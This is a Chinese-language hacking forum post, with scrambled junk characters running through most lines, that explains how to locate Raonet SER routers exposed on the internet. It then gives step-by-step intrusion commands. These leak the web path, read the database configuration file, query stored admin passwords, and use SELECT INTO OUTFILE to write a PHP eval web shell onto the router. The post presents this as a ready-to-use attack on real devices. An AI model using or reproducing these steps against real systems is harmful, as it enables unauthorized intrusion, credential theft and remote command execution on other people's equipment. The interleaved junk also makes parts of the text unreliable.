寻找存在漏洞的路由器方法:1 p5 w4 ~9 U9 o
# |5 k& M% e9 B; a
1:google搜索'Raonet Subscriber Ethernet Router'0 J8 i9 T! c3 r% L
% P# Y4 N& ^; n' V2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001! W# r) v- ^+ r' f. W- d+ u4 i
( }4 b9 i3 W: a% y3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
9 Z, X8 P8 [* c( K, r/ w, a$ I9 y2 L n8 j: U, F# F
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......, P9 F: w* M) J8 C
6 ]8 v6 J. s# ~- s# m0 a, ^9 a) j
8 d' |% p' I. x- s% P% P9 `; d+ B6 ~+ K5 }7 d4 j! u1 |- U+ T
入侵步骤:
/ [& m* ]& o6 H$ \4 b0 z$ F0 L" v. i, R9 d* u9 m0 E0 d9 O
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
+ k0 ]) f z1 I1 ^4 h/ h, A: J
/ P k) r1 o* r) y) o. O3 z; H' `2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
* [4 I a0 ~4 _2 ^# ~9 a; |3:得到密码后连接,查看GUI管理密码:
+ W% C- x `* _, @/ j: m8 Guse ser_500) j# J" k# K, r8 I/ k
select id,passwd from user;0 c3 J ^8 I# Q: E- Z6 s' B& A" b! c
4:通过数据库写入webshell,执行命令:
3 p1 @9 X9 F3 U; xuse mysql;
1 p. U6 U" I* k1 ecreate table ok(cmd TEXT);
) I9 H. L7 o9 ^insert into ok values("<?php @eval($_POST[cmd])?>");
' Z: b" j! z8 \, e- mselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
. R) D" a* B4 Bdrop table ok;5 g' g3 f4 v$ @
. h% j3 S: O9 @. M& n
5:连接后门shell.php 0 j3 v( Z1 N7 w
( ]+ I" r2 }8 C: t$ k6. 搞定!* p1 L7 i7 Q9 C2 ]' L0 r R% r- W" P2 T
2 q3 y. G. u6 s7 K, W' ? |